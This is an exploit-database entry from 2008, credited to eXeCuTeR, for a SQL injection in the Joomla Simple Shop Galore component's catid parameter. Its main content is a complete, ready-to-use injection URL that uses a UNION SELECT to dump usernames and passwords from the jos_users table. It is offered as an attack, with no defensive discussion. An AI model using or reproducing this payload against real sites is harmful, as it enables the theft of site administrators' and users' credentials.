|
|
| Details : ExploitAlert |
|
|
Topic : | Joomla Simple Shop Galore Component 3.x (catid) SQL Injection
|
ExploitAlert : 4112
Milw0rm ID : 5833
Credit : eXeCuTeR
Date : 17.6.2008
Download
 Exploit Code : ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection
------------------------------------------------------
@ AUTHOR: eXeCuTeR <executerx[at]gmail[dot]com>
------------------------------------------------------
------------------------------------------------------
@ DORK: :\
------------------------------------------------------
@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20un
ion%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_us
ers--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
~EOF~
side note:
but this was sent in back in 02/2008, must of missed it. Original author:
eXeCuTeR.
|
|
|
|